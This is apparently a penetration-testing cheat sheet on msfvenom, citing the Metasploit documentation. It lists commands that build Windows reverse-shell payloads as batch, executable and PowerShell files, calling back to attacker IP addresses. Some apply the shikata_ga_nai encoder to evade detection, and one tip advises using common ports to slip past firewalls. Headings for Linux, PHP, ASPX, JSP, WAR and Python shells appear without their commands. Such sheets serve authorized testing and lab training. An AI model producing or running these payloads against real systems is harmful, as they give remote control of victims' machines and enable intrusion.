msfvenom
Source https://docs.metasploit.com/
Always use known port for lhost like , 53, 443, 8080 as most of time firewall will block unknown ports traffic and you will not get connection back
List available formats
msfvenom --list formatsList available payloads for specific platform
msfvenom --payload --list-options | grep windowsWindows
bat reverse shell
mostly used with JuicyPotato exploit
msfvenom -p cmd/windows/reverse_powershell lhost=10.10.12.15 lport=4444 > shell.batexe reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exePowershell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1x64 Bit payload
Embedded payload
Linux
bind shell
reverse shell
Other Platforms
php reverse shell
aspx reverse shell
Java WAR reverse shell
Most time will used to get shell on tomcat
jsp reverse shell
python reverse shell
Last updated
Was this helpful?